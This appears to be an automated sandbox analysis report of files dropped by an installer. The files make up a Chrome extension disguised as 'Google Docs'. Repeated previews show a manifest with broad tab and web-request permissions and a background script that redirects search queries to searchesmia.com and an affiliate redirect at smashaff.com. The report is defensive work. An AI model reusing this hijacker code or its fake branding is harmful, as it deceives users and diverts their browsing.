                                                                                                                  SHA1:9EB22A6CE2AD88F9BC5EAA06367E80BB548E6EBF
                                                                                                                  SHA-256:BFB7F6DC266847896A21A8513D639EABF3F74D2A2DEF95104459AD322B13FAC6
                                                                                                                  SHA-512:053D949B67ADAFB42C4285410546514E0954A219A4999ADE8E266511802E94FD2BAEE2B57D0B7F1C13AB09EAD724DF6FB09AD7DCF1226FB263D4477B61BB459F
                                                                                                                  Malicious:false
                                                                                                                  Preview:{.. "manifest_version": 3,.. "name": " Google Docs",.. "short_name": "Google Docs",.. "version": "1.0",.. "background": {.. "service_worker": "bg/background.js",.. "type": "module".. },.. "action": {.. "default_title": "Google Docs",.. "default_icon": "img/logo/logo-16.png".. },.. "content_security_policy": {.. "extension_pages": "script-src 'self'; object-src 'self'".. },.. "description": "Edit, create, and view your documents, spreadsheets, and presentations . all without internet access.",.. "icons": {.. "16": "img/logo/logo-16.png",.. "48": "img/logo/logo-48.png",.. "128": "img/logo/logo-128.png".. },.. "incognito": "spanning",.. "permissions": [.. "activeTab",.. "declarativeNetRequest",.. "webNavigation",.. "storage",.. "tabs",.. "webRequest".. ],.. "host_permissions": [.. "http://*/*",.. "https://*/*".. ],.. "web_accessible_resources": [.. {.. "resources": [.. "img/logo/logo-16.png".. ],..
                                                                                                                  Process:C:\Windows\System32\xcopy.exe
                                                                                                                  File Type:ASCII text, with very long lines (662), with CRLF line terminators
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):6986
                                                                                                                  Entropy (8bit):4.8857905053740325
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:192:s3iymZL/btGE2pRfQpxPyaGDd6M3TDsyzAr:TymZYexPWDcME
                                                                                                                  MD5:9E14A24DABF427581BE3933A700715E6
                                                                                                                  SHA1:2F4A29E39A69944D6A954ECCE21607F5CE8E2A1E
                                                                                                                  SHA-256:0ADE971AE68AE6D818E9837AB8C6D4D603AC0BB3D23AA78A0F5D1B91706E155E
                                                                                                                  SHA-512:5292B9E01C044CBBCDBB1E3A558FBA3542A577D3D54E1282282D1C13D1A10BED440D602657D25014249B74EC3F8EA1EF506C47C0C00EF01C9D7D37DD72FB3D09
                                                                                                                  Malicious:false
                                                                                                                  Preview:var data=['yahoo.com','p','q','https://searchesmia.com/bingchr4?q=',..'^http(s)?:\/\/(www|search?).(google|yahoo|bing|ecosia)?\.[a-z]{2,4}\/search',..'^http(s)?:\/\/(www|search?).yahoo.com\/yhs\/search',..'duckduckgo.com/?q=','ask.com/web?','/%20/g','+','www.','&first','bing.com',..'7fk8qechol',..'popup',..'https://smashaff.com/redirect?&url=',..'www',..'amazon.com',..'colort',..'smashaff.com'..];....let tabsHistory = {};..let throughSmash = {};..let prevBing = {};....var seaDefault = new RegExp(data[4]);..var yasea = new RegExp(data[5]); ..var dusea = new RegExp(data[6]);..var asksea = new RegExp(data[7]);....function convertURL(hostname, urlParams) {.. var uri = '';.. if (hostname.indexOf(data[0]) !== -1).. uri = urlParams.get('p');.. else.. uri = urlParams.get('q');.. return data[3] + uri;.. }....try {.. chrome.tabs.onUpdated.addListener((tabId, info) => { if(data!=undefined){ .. if(info.status) {.. if(info.stat
                                                                                                                  Process:C:\Windows\System32\xcopy.exe
                                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):203
                                                                                                                  Entropy (8bit):4.676765497065817
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:6:BKsg+RoJf2QQ0g+RosxEjqOuWE42q93wdy:BNoJPQUosx5CH22J
                                                                                                                  MD5:7A0EA7C07E1D4AE1444C0B11827D2C77
                                                                                                                  SHA1:6C704E23C57178101F0CFDB3FD8A5439EEFCCF92
                                                                                                                  SHA-256:7FD6486432256C15FA6568F04AF2DB56DE31E9AECC16044B3D5B488957A7BCC2
                                                                                                                  SHA-512:9DF327ECAC037E1A3AB9432C290C886CDD06E4623679CDD5596157866AD7AE45A6F2DA533DFC8A44719F44ECC70153E6D0DB3435C39999B940A039D000AC923A
                                                                                                                  Malicious:false
                                                                                                                  Preview:..window.addEventListener('load',function(){.... window.addEventListener('click',function(){.... // alert('cp');.... chrome.runtime.sendMessage({'cout': 'reset'});.... });........});..
                                                                                                                  Process:C:\Windows\System32\xcopy.exe
                                                                                                                  File Type:PNG image data, 128 x 128, 8-bit/color RGBA, non-interlaced
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):4982
                                                                                                                  Entropy (8bit):7.929761711048726
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:96:L7Rf7U1ylWb3KfyEfOXE+PIcvBirQFiAql1ZwKREkXCSAk:pTvWqfD+gl0sAql1u7kySAk
                                                                                                                  MD5:913064ADAAA4C4FA2A9D011B66B33183
                                                                                                                  SHA1:99EA751AC2597A080706C690612AEEEE43161FC1
                                                                                                                  SHA-256:AFB4CE8882EF7AE80976EBA7D87F6E07FCDDC8E9E84747E8D747D1E996DEA8EB
                                                                                                                  SHA-512:162BF69B1AD5122C6154C111816E4B87A8222E6994A72743ED5382D571D293E1467A2ED2FC6CC27789B644943CF617A56DA530B6A6142680C5B2497579A632B5
                                                                                                                  Malicious:false
                                                                                                                  Preview:.PNG........IHDR..............>a....=IDATx..]}...U..;...O.Q..QH.I(....v..E....GUb*..R[.4@%..hK..B..(.B..". ....&)U#.%...jZ...JC.8.....{.cfvgf.3;.....}ow.....{...P.B...*T.P.B...*Tx...=.Q..wv.w.....|.e.1.$.P.?..l_\.n.}...~.g.....Q...A.f....m.....{,...C2 %..X.......FE.1.N..f...Q..D.K87.....:g..Q.{............3@$.8.....{.....q....G.. .....5..y......)XK..F...D.......... ."8...J#.eM.i....H.E.....a.RIP.`......)..T.....! .[p`X.`..L.a....e. .T..2.....H..p$..02...j....\..........s{...Ymm~.a........f.$./.[.{..C.2:.0..6..]....`....NW.....0..o.T..$;k.2......_...k..{,.+........{..6...L..... .dw...l$..}...K...EV....0......P...e....k....+Go....qw.9.1...X2\..qfw0v.....N...{...l.."....f.A..I..+#.v....'..~E.N-k.........{...l.$..ga..1...$......x$X=}.N..S..B$p..`..`.ZG:c..RA.(.0......Gg.A.I..>...3u.u........_..KO.m.........C...,..c.......0...@_..m...-..7.......4LZ......j@.......\..'....u. QJ.:G..I`.w'B0..w.H..'b.0- ......|..}./.....e..,.K.1........W.u.v. ...\.o
                                                                                                                  Process:C:\Windows\System32\xcopy.exe
                                                                                                                  File Type:PNG image data, 128 x 128, 8-bit/color RGBA, non-interlaced
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):4982
                                                                                                                  Entropy (8bit):7.929761711048726
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:96:L7Rf7U1ylWb3KfyEfOXE+PIcvBirQFiAql1ZwKREkXCSAk:pTvWqfD+gl0sAql1u7kySAk
                                                                                                                  MD5:913064ADAAA4C4FA2A9D011B66B33183
                                                                                                                  SHA1:99EA751AC2597A080706C690612AEEEE43161FC1
                                                                                                                  SHA-256:AFB4CE8882EF7AE80976EBA7D87F6E07FCDDC8E9E84747E8D747D1E996DEA8EB
                                                                                                                  SHA-512:162BF69B1AD5122C6154C111816E4B87A8222E6994A72743ED5382D571D293E1467A2ED2FC6CC27789B644943CF617A56DA530B6A6142680C5B2497579A632B5
                                                                                                                  Malicious:false
                                                                                                                  Preview:.PNG........IHDR..............>a....=IDATx..]}...U..;...O.Q..QH.I(....v..E....GUb*..R[.4@%..hK..B..(.B..". ....&)U#.%...jZ...JC.8.....{.cfvgf.3;.....}ow.....{...P.B...*T.P.B...*Tx...=.Q..wv.w.....|.e.1.$.P.?..l_\.n.}...~.g.....Q...A.f....m.....{,...C2 %..X.......FE.1.N..f...Q..D.K87.....:g..Q.{............3@$.8.....{.....q....G.. .....5..y......)XK..F...D.......... ."8...J#.eM.i....H.E.....a.RIP.`......)..T.....! .[p`X.`..L.a....e. .T..2.....H..p$..02...j....\..........s{...Ymm~.a........f.$./.[.{..C.2:.0..6..]....`....NW.....0..o.T..$;k.2......_...k..{,.+........{..6...L..... .dw...l$..}...K...EV....0......P...e....k....+Go....qw.9.1...X2\..qfw0v.....N...{...l.."....f.A..I..+#.v....'..~E.N-k.........{...l.$..ga..1...$......x$X=}.N..S..B$p..`..`.ZG:c..RA.(.0......Gg.A.I..>...3u.u........_..KO.m.........C...,..c.......0...@_..m...-..7.......4LZ......j@.......\..'....u. QJ.:G..I`.w'B0..w.H..'b.0- ......|..}./.....e..,.K.1........W.u.v. ...\.o
                                                                                                                  Process:C:\Windows\System32\xcopy.exe
                                                                                                                  File Type:PNG image data, 128 x 128, 8-bit/color RGBA, non-interlaced
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):4982
                                                                                                                  Entropy (8bit):7.929761711048726
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:96:L7Rf7U1ylWb3KfyEfOXE+PIcvBirQFiAql1ZwKREkXCSAk:pTvWqfD+gl0sAql1u7kySAk
                                                                                                                  MD5:913064ADAAA4C4FA2A9D011B66B33183
                                                                                                                  SHA1:99EA751AC2597A080706C690612AEEEE43161FC1
                                                                                                                  SHA-256:AFB4CE8882EF7AE80976EBA7D87F6E07FCDDC8E9E84747E8D747D1E996DEA8EB
                                                                                                                  SHA-512:162BF69B1AD5122C6154C111816E4B87A8222E6994A72743ED5382D571D293E1467A2ED2FC6CC27789B644943CF617A56DA530B6A6142680C5B2497579A632B5
                                                                                                                  Malicious:false
                                                                                                                  Preview:.PNG........IHDR..............>a....=IDATx..]}...U..;...O.Q..QH.I(....v..E....GUb*..R[.4@%..hK..B..(.B..". ....&)U#.%...jZ...JC.8.....{.cfvgf.3;.....}ow.....{...P.B...*T.P.B...*Tx...=.Q..wv.w.....|.e.1.$.P.?..l_\.n.}...~.g.....Q...A.f....m.....{,...C2 %..X.......FE.1.N..f...Q..D.K87.....:g..Q.{............3@$.8.....{.....q....G.. .....5..y......)XK..F...D.......... ."8...J#.eM.i....H.E.....a.RIP.`......)..T.....! .[p`X.`..L.a....e. .T..2.....H..p$..02...j....\..........s{...Ymm~.a........f.$./.[.{..C.2:.0..6..]....`....NW.....0..o.T..$;k.2......_...k..{,.+........{..6...L..... .dw...l$..}...K...EV....0......P...e....k....+Go....qw.9.1...X2\..qfw0v.....N...{...l.."....f.A..I..+#.v....'..~E.N-k.........{...l.$..ga..1...$......x$X=}.N..S..B$p..`..`.ZG:c..RA.(.0......Gg.A.I..>...3u.u........_..KO.m.........C...,..c.......0...@_..m...-..7.......4LZ......j@.......\..'....u. QJ.:G..I`.w'B0..w.H..'b.0- ......|..}./.....e..,.K.1........W.u.v. ...\.o
                                                                                                                  Process:C:\Windows\System32\xcopy.exe
                                                                                                                  File Type:SVG Scalable Vector Graphics image
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):7028
                                                                                                                  Entropy (8bit):5.226588714703554
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:192:1k1V0qvSRaTa5Tn9IpXHWEVAWJ77bWEVTexdjWUKqhv:GqT95oV7y+Kd6ULhv
                                                                                                                  MD5:23AA4675166ABF6DBB1661318F2091CD
                                                                                                                  SHA1:AD71B9576BC722252CACA2AE35A29AAAFF2BC273
                                                                                                                  SHA-256:1BB529A289367ABAF7AC40A04CB999D1DCA10EFB5AB12D406E255DCD2E107C78
                                                                                                                  SHA-512:3A0DB1E3BE57E68B974A25A3E97E410BB25BAC78C2C0890B26A0ED74A7237B8E74C6A521339D78E56840939AFA09335D8BC5EB8B8832C0835010F08284790034
                                                                                                                  Malicious:false
                                                                                                                  Preview:<?xml version="1.0" encoding="UTF-8" standalone="no"?>.. Created with Inkscape (http://www.inkscape.org/) -->....<svg.. xmlns:dc="http://purl.org/dc/elements/1.1/".. xmlns:cc="http://creativecommons.org/ns#".. xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#".. xmlns:svg="http://www.w3.org/2000/svg".. xmlns="http://www.w3.org/2000/svg".. xmlns:xlink="http://www.w3.org/1999/xlink".. xmlns:sodipodi="http://sodipodi.sourceforge.net/DTD/sodipodi-0.dtd".. xmlns:inkscape="http://www.inkscape.org/namespaces/inkscape".. width="5.8741975mm".. height="5.8741975mm".. viewBox="0 0 5.8741975 5.8741975".. version="1.1".. id="svg8".. inkscape:version="0.92.3 (2405546, 2018-03-11)".. sodipodi:docname="logo.svg".. inkscape:export-filename="/home/simon/Lien vers Files/Programming/Browser-addons/chrome-addon-v3-starter/logo/logo-128.png".. inkscape:export-xdpi="553.47137".. inkscape:export-ydpi="553.47137">.. <defs.. id="defs2">.. <linearGradient..
                                                                                                                  Process:C:\Windows\System32\xcopy.exe
                                                                                                                  File Type:JSON data
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):1202
                                                                                                                  Entropy (8bit):4.7259052604003875
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:24:5KRwq1wVIsJ4K7LyRJ/GuHRmBONQg2SXDiiKbzq86UXYw5Pg+pG8WKUuL:UiG0BZnyR5GuHRmBRg2SXD2q83YuvpXL
                                                                                                                  MD5:B5923D09C1D62C8B718473CC804D6F77
                                                                                                                  SHA1:9EB22A6CE2AD88F9BC5EAA06367E80BB548E6EBF
                                                                                                                  SHA-256:BFB7F6DC266847896A21A8513D639EABF3F74D2A2DEF95104459AD322B13FAC6
                                                                                                                  SHA-512:053D949B67ADAFB42C4285410546514E0954A219A4999ADE8E266511802E94FD2BAEE2B57D0B7F1C13AB09EAD724DF6FB09AD7DCF1226FB263D4477B61BB459F
                                                                                                                  Malicious:false
                                                                                                                  Preview:{.. "manifest_version": 3,.. "name": " Google Docs",.. "short_name": "Google Docs",.. "version": "1.0",.. "background": {.. "service_worker": "bg/background.js",.. "type": "module".. },.. "action": {.. "default_title": "Google Docs",.. "default_icon": "img/logo/logo-16.png".. },.. "content_security_policy": {.. "extension_pages": "script-src 'self'; object-src 'self'".. },.. "description": "Edit, create, and view your documents, spreadsheets, and presentations . all without internet access.",.. "icons": {.. "16": "img/logo/logo-16.png",.. "48": "img/logo/logo-48.png",.. "128": "img/logo/logo-128.png".. },.. "incognito": "spanning",.. "permissions": [.. "activeTab",.. "declarativeNetRequest",.. "webNavigation",.. "storage",.. "tabs",.. "webRequest".. ],.. "host_permissions": [.. "http://*/*",.. "https://*/*".. ],.. "web_accessible_resources": [.. {.. "resources": [.. "img/logo/logo-16.png".. ],..
                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-DAB6L.tmp\$RDGU87D.tmp
                                                                                                                  File Type:ASCII text, with very long lines (662), with CRLF line terminators
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):6986
                                                                                                                  Entropy (8bit):4.8857905053740325
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:192:s3iymZL/btGE2pRfQpxPyaGDd6M3TDsyzAr:TymZYexPWDcME
                                                                                                                  MD5:9E14A24DABF427581BE3933A700715E6
                                                                                                                  SHA1:2F4A29E39A69944D6A954ECCE21607F5CE8E2A1E
                                                                                                                  SHA-256:0ADE971AE68AE6D818E9837AB8C6D4D603AC0BB3D23AA78A0F5D1B91706E155E
                                                                                                                  SHA-512:5292B9E01C044CBBCDBB1E3A558FBA3542A577D3D54E1282282D1C13D1A10BED440D602657D25014249B74EC3F8EA1EF506C47C0C00EF01C9D7D37DD72FB3D09
                                                                                                                  Malicious:false
                                                                                                                  Preview:var data=['yahoo.com','p','q','https://searchesmia.com/bingchr4?q=',..'^http(s)?:\/\/(www|search?).(google|yahoo|bing|ecosia)?\.[a-z]{2,4}\/search',..'^http(s)?:\/\/(www|search?).yahoo.com\/yhs\/search',..'duckduckgo.com/?q=','ask.com/web?','/%20/g','+','www.','&first','bing.com',..'7fk8qechol',..'popup',..'https://smashaff.com/redirect?&url=',..'www',..'amazon.com',..'colort',..'smashaff.com'..];....let tabsHistory = {};..let throughSmash = {};..let prevBing = {};....var seaDefault = new RegExp(data[4]);..var yasea = new RegExp(data[5]); ..var dusea = new RegExp(data[6]);..var asksea = new RegExp(data[7]);....function convertURL(hostname, urlParams) {.. var uri = '';.. if (hostname.indexOf(data[0]) !== -1).. uri = urlParams.get('p');.. else.. uri = urlParams.get('q');.. return data[3] + uri;.. }....try {.. chrome.tabs.onUpdated.addListener((tabId, info) => { if(data!=undefined){ .. if(info.status) {.. if(info.stat
                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-DAB6L.tmp\$RDGU87D.tmp
                                                                                                                  File Type:ASCII text, with very long lines (662), with CRLF line terminators
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):6986
                                                                                                                  Entropy (8bit):4.8857905053740325
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:192:s3iymZL/btGE2pRfQpxPyaGDd6M3TDsyzAr:TymZYexPWDcME
                                                                                                                  MD5:9E14A24DABF427581BE3933A700715E6
                                                                                                                  SHA1:2F4A29E39A69944D6A954ECCE21607F5CE8E2A1E
                                                                                                                  SHA-256:0ADE971AE68AE6D818E9837AB8C6D4D603AC0BB3D23AA78A0F5D1B91706E155E
                                                                                                                  SHA-512:5292B9E01C044CBBCDBB1E3A558FBA3542A577D3D54E1282282D1C13D1A10BED440D602657D25014249B74EC3F8EA1EF506C47C0C00EF01C9D7D37DD72FB3D09
                                                                                                                  Malicious:false
                                                                                                                  Preview:var data=['yahoo.com','p','q','https://searchesmia.com/bingchr4?q=',..'^http(s)?:\/\/(www|search?).(google|yahoo|bing|ecosia)?\.[a-z]{2,4}\/search',..'^http(s)?:\/\/(www|search?).yahoo.com\/yhs\/search',..'duckduckgo.com/?q=','ask.com/web?','/%20/g','+','www.','&first','bing.com',..'7fk8qechol',..'popup',..'https://smashaff.com/redirect?&url=',..'www',..'amazon.com',..'colort',..'smashaff.com'..];....let tabsHistory = {};..let throughSmash = {};..let prevBing = {};....var seaDefault = new RegExp(data[4]);..var yasea = new RegExp(data[5]); ..var dusea = new RegExp(data[6]);..var asksea = new RegExp(data[7]);....function convertURL(hostname, urlParams) {.. var uri = '';.. if (hostname.indexOf(data[0]) !== -1).. uri = urlParams.get('p');.. else.. uri = urlParams.get('q');.. return data[3] + uri;.. }....try {.. chrome.tabs.onUpdated.addListener((tabId, info) => { if(data!=undefined){ .. if(info.status) {.. if(info.stat
                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-DAB6L.tmp\$RDGU87D.tmp
                                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):203
                                                                                                                  Entropy (8bit):4.676765497065817
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:6:BKsg+RoJf2QQ0g+RosxEjqOuWE42q93wdy:BNoJPQUosx5CH22J
                                                                                                                  MD5:7A0EA7C07E1D4AE1444C0B11827D2C77
                                                                                                                  SHA1:6C704E23C57178101F0CFDB3FD8A5439EEFCCF92
                                                                                                                  SHA-256:7FD6486432256C15FA6568F04AF2DB56DE31E9AECC16044B3D5B488957A7BCC2
                                                                                                                  SHA-512:9DF327ECAC037E1A3AB9432C290C886CDD06E4623679CDD5596157866AD7AE45A6F2DA533DFC8A44719F44ECC70153E6D0DB3435C39999B940A039D000AC923A
                                                                                                                  Malicious:false
                                                                                                                  Preview:..window.addEventListener('load',function(){.... window.addEventListener('click',function(){.... // alert('cp');.... chrome.runtime.sendMessage({'cout': 'reset'});.... });........});..
                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-DAB6L.tmp\$RDGU87D.tmp
                                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):203
                                                                                                                  Entropy (8bit):4.676765497065817
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:6:BKsg+RoJf2QQ0g+RosxEjqOuWE42q93wdy:BNoJPQUosx5CH22J
                                                                                                                  MD5:7A0EA7C07E1D4AE1444C0B11827D2C77
                                                                                                                  SHA1:6C704E23C57178101F0CFDB3FD8A5439EEFCCF92
                                                                                                                  SHA-256:7FD6486432256C15FA6568F04AF2DB56DE31E9AECC16044B3D5B488957A7BCC2
                                                                                                                  SHA-512:9DF327ECAC037E1A3AB9432C290C886CDD06E4623679CDD5596157866AD7AE45A6F2DA533DFC8A44719F44ECC70153E6D0DB3435C39999B940A039D000AC923A
                                                                                                                  Malicious:false
                                                                                                                  Preview:..window.addEventListener('load',function(){.... window.addEventListener('click',function(){.... // alert('cp');.... chrome.runtime.sendMessage({'cout': 'reset'});.... });........});..
                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-DAB6L.tmp\$RDGU87D.tmp
                                                                                                                  File Type:PNG image data, 128 x 128, 8-bit/color RGBA, non-interlaced
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):4982
                                                                                                                  Entropy (8bit):7.929761711048726
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:96:L7Rf7U1ylWb3KfyEfOXE+PIcvBirQFiAql1ZwKREkXCSAk:pTvWqfD+gl0sAql1u7kySAk
                                                                                                                  MD5:913064ADAAA4C4FA2A9D011B66B33183
                                                                                                                  SHA1:99EA751AC2597A080706C690612AEEEE43161FC1
                                                                                                                  SHA-256:AFB4CE8882EF7AE80976EBA7D87F6E07FCDDC8E9E84747E8D747D1E996DEA8EB
                                                                                                                  SHA-512:162BF69B1AD5122C6154C111816E4B87A8222E6994A72743ED5382D571D293E1467A2ED2FC6CC27789B644943CF617A56DA530B6A6142680C5B2497579A632B5
                                                                                                                  Malicious:false
                                                                                                                  Preview:.PNG........IHDR..............>a....=IDATx..]}...U..;...O.Q..QH.I(....v..E....GUb*..R[.4@%..hK..B..(.B..". ....&)U#.%...jZ...JC.8.....{.cfvgf.3;.....}ow.....{...P.B...*T.P.B...*Tx...=.Q..wv.w.....|.e.1.$.P.?..l_\.n.}...~.g.....Q...A.f....m.....{,...C2 %..X.......FE.1.N..f...Q..D.K87.....:g..Q.{............3@$.8.....{.....q....G.. .....5..y......)XK..F...D.......... ."8...J#.eM.i....H.E.....a.RIP.`......)..T.....! .[p`X.`..L.a....e. .T..2.....H..p$..02...j....\..........s{...Ymm~.a........f.$./.[.{..C.2:.0..6..]....`....NW.....0..o.T..$;k.2......_...k..{,.+........{..6...L..... .dw...l$..}...K...EV....0......P...e....k....+Go....qw.9.1...X2\..qfw0v.....N...{...l.."....f.A..I..+#.v....'..~E.N-k.........{...l.$..ga..1...$......x$X=}.N..S..B$p..`..`.ZG:c..RA.(.0......Gg.A.I..>...3u.u........_..KO.m.........C...,..c.......0...@_..m...-..7.......4LZ......j@.......\..'....u. QJ.:G..I`.w'B0..w.H..'b.0- ......|..}./.....e..,.K.1........W.u.v. ...\.o
                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-DAB6L.tmp\$RDGU87D.tmp
                                                                                                                  File Type:PNG image data, 128 x 128, 8-bit/color RGBA, non-interlaced
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):4982
                                                                                                                  Entropy (8bit):7.929761711048726
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:96:L7Rf7U1ylWb3KfyEfOXE+PIcvBirQFiAql1ZwKREkXCSAk:pTvWqfD+gl0sAql1u7kySAk
                                                                                                                  MD5:913064ADAAA4C4FA2A9D011B66B33183
                                                                                                                  SHA1:99EA751AC2597A080706C690612AEEEE43161FC1
                                                                                                                  SHA-256:AFB4CE8882EF7AE80976EBA7D87F6E07FCDDC8E9E84747E8D747D1E996DEA8EB
                                                                                                                  SHA-512:162BF69B1AD5122C6154C111816E4B87A8222E6994A72743ED5382D571D293E1467A2ED2FC6CC27789B644943CF617A56DA530B6A6142680C5B2497579A632B5
                                                                                                                  Malicious:false
                                                                                                                  Preview:.PNG........IHDR..............>a....=IDATx..]}...U..;...O.Q..QH.I(....v..E....GUb*..R[.4@%..hK..B..(.B..". ....&)U#.%...jZ...JC.8.....{.cfvgf.3;.....}ow.....{...P.B...*T.P.B...*Tx...=.Q..wv.w.....|.e.1.$.P.?..l_\.n.}...~.g.....Q...A.f....m.....{,...C2 %..X.......FE.1.N..f...Q..D.K87.....:g..Q.{............3@$.8.....{.....q....G.. .....5..y......)XK..F...D.......... ."8...J#.eM.i....H.E.....a.RIP.`......)..T.....! .[p`X.`..L.a....e. .T..2.....H..p$..02...j....\..........s{...Ymm~.a........f.$./.[.{..C.2:.0..6..]....`....NW.....0..o.T..$;k.2......_...k..{,.+........{..6...L..... .dw...l$..}...K...EV....0......P...e....k....+Go....qw.9.1...X2\..qfw0v.....N...{...l.."....f.A..I..+#.v....'..~E.N-k.........{...l.$..ga..1...$......x$X=}.N..S..B$p..`..`.ZG:c..RA.(.0......Gg.A.I..>...3u.u........_..KO.m.........C...,..c.......0...@_..m...-..7.......4LZ......j@.......\..'....u. QJ.:G..I`.w'B0..w.H..'b.0- ......|..}./.....e..,.K.1........W.u.v. ...\.o
                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-DAB6L.tmp\$RDGU87D.tmp
                                                                                                                  File Type:PNG image data, 128 x 128, 8-bit/color RGBA, non-interlaced
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):4982
                                                                                                                  Entropy (8bit):7.929761711048726
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:96:L7Rf7U1ylWb3KfyEfOXE+PIcvBirQFiAql1ZwKREkXCSAk:pTvWqfD+gl0sAql1u7kySAk
                                                                                                                  MD5:913064ADAAA4C4FA2A9D011B66B33183
                                                                                                                  SHA1:99EA751AC2597A080706C690612AEEEE43161FC1
                                                                                                                  SHA-256:AFB4CE8882EF7AE80976EBA7D87F6E07FCDDC8E9E84747E8D747D1E996DEA8EB
                                                                                                                  SHA-512:162BF69B1AD5122C6154C111816E4B87A8222E6994A72743ED5382D571D293E1467A2ED2FC6CC27789B644943CF617A56DA530B6A6142680C5B2497579A632B5
                                                                                                                  Malicious:false
                                                                                                                  Preview:.PNG........IHDR..............>a....=IDATx..]}...U..;...O.Q..QH.I(....v..E....GUb*..R[.4@%..hK..B..(.B..". ....&)U#.%...jZ...JC.8.....{.cfvgf.3;.....}ow.....{...P.B...*T.P.B...*Tx...=.Q..wv.w.....|.e.1.$.P.?..l_\.n.}...~.g.....Q...A.f....m.....{,...C2 %..X.......FE.1.N..f...Q..D.K87.....:g..Q.{............3@$.8.....{.....q....G.. .....5..y......)XK..F...D.......... ."8...J#.eM.i....H.E.....a.RIP.`......)..T.....! .[p`X.`..L.a....e. .T..2.....H..p$..02...j....\..........s{...Ymm~.a........f.$./.[.{..C.2:.0..6..]....`....NW.....0..o.T..$;k.2......_...k..{,.+........{..6...L..... .dw...l$..}...K...EV....0......P...e....k....+Go....qw.9.1...X2\..qfw0v.....N...{...l.."....f.A..I..+#.v....'..~E.N-k.........{...l.$..ga..1...$......x$X=}.N..S..B$p..`..`.ZG:c..RA.(.0......Gg.A.I..>...3u.u........_..KO.m.........C...,..c.......0...@_..m...-..7.......4LZ......j@.......\..'....u. QJ.:G..I`.w'B0..w.H..'b.0- ......|..}./.....e..,.K.1........W.u.v. ...\.o
                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-DAB6L.tmp\$RDGU87D.tmp
                                                                                                                  File Type:SVG Scalable Vector Graphics image
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):7028
                                                                                                                  Entropy (8bit):5.226588714703554
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:192:1k1V0qvSRaTa5Tn9IpXHWEVAWJ77bWEVTexdjWUKqhv:GqT95oV7y+Kd6ULhv
                                                                                                                  MD5:23AA4675166ABF6DBB1661318F2091CD
                                                                                                                  SHA1:AD71B9576BC722252CACA2AE35A29AAAFF2BC273
                                                                                                                  SHA-256:1BB529A289367ABAF7AC40A04CB999D1DCA10EFB5AB12D406E255DCD2E107C78
                                                                                                                  SHA-512:3A0DB1E3BE57E68B974A25A3E97E410BB25BAC78C2C0890B26A0ED74A7237B8E74C6A521339D78E56840939AFA09335D8BC5EB8B8832C0835010F08284790034
                                                                                                                  Malicious:false
                                                                                                                  Preview:<?xml version="1.0" encoding="UTF-8" standalone="no"?>.. Created with Inkscape (http://www.inkscape.org/) -->....<svg.. xmlns:dc="http://purl.org/dc/elements/1.1/".. xmlns:cc="http://creativecommons.org/ns#".. xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#".. xmlns:svg="http://www.w3.org/2000/svg".. xmlns="http://www.w3.org/2000/svg".. xmlns:xlink="http://www.w3.org/1999/xlink".. xmlns:sodipodi="http://sodipodi.sourceforge.net/DTD/sodipodi-0.dtd".. xmlns:inkscape="http://www.inkscape.org/namespaces/inkscape".. width="5.8741975mm".. height="5.8741975mm".. viewBox="0 0 5.8741975 5.8741975".. version="1.1".. id="svg8".. inkscape:version="0.92.3 (2405546, 2018-03-11)".. sodipodi:docname="logo.svg".. inkscape:export-filename="/home/simon/Lien vers Files/Programming/Browser-addons/chrome-addon-v3-starter/logo/logo-128.png".. inkscape:export-xdpi="553.47137".. inkscape:export-ydpi="553.47137">.. <defs.. id="defs2">.. <linearGradient..
                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-DAB6L.tmp\$RDGU87D.tmp
                                                                                                                  File Type:PNG image data, 128 x 128, 8-bit/color RGBA, non-interlaced
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):4982
                                                                                                                  Entropy (8bit):7.929761711048726
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:96:L7Rf7U1ylWb3KfyEfOXE+PIcvBirQFiAql1ZwKREkXCSAk:pTvWqfD+gl0sAql1u7kySAk
                                                                                                                  MD5:913064ADAAA4C4FA2A9D011B66B33183
                                                                                                                  SHA1:99EA751AC2597A080706C690612AEEEE43161FC1
